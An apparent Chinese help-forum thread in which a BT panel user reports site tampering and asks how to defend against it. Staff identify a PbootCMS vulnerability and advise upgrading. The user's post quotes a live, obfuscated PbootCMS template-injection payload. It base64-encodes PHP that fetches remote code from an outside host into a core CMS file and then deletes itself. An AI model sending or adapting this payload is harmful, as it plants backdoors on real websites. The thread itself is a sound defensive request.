当前位置:论坛首页 > Linux面板 > 求助

【待反馈】关于Nginx防火墙防篡改

发表在 Linux面板2024-8-8 08:39 [复制链接] 5 457

为了能快速了解并处理您的问题,请提供以下基础信息:
面板、插件版本:9.5

系统版本:9.1

问题描述:被篡改

相关截图(日志、错误):/{pboot:if(("file_put_co"."ntents")("temp.php",("base6"."4_decode")("PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCcuL2NvcmUvYmFzaWMvZnVuLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kLnNvZ291YWQudmlwL3R4dC9tYTEudHh0JykpOwplY2hvICd0ZW1wMTExODg4JzsKdW5saW5rKF9fRklMRV9fKTs=")))}{/pboot:if}/../../?p=20请问这种怎么防御

使用道具 举报 只看该作者 回复
发表于 2024-8-8 08:40:51 | 显示全部楼层
微信截图_20240808084002.png
使用道具 举报 回复 支持 反对
发表于 2024-8-8 09:22:28 | 显示全部楼层
这个是pbootcms  漏洞的payload 。你可以登录pbootcms后台把程序升级到最新版本。
使用道具 举报 回复 支持 反对
发表于 2024-8-8 09:22:43 | 显示全部楼层
防火墙会后续增加对这块的拦截
使用道具 举报 回复 支持 反对
发表于 2024-8-8 11:39:10 | 显示全部楼层
宝塔技术-小强 发表于 2024-8-8 09:22
防火墙会后续增加对这块的拦截

微信截图_20240808113420.png
另外一个现象,最近经常出现这种显示未安装的状态,进入面板刷新几次会显示正常
出现这种现象后,大概率会有被篡改的
使用道具 举报 回复 支持 反对
发表于 2024-8-8 11:51:58 | 显示全部楼层
一盆袜子 发表于 2024-8-8 11:39
另外一个现象,最近经常出现这种显示未安装的状态,进入面板刷新几次会显示正常
出现这种现象后,大概率 ...

您好,您这边执行bt 16修复一下面板后再查看一下
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

立即付费处理

工作时间:09:00至24:00

快速回复 返回顶部 返回列表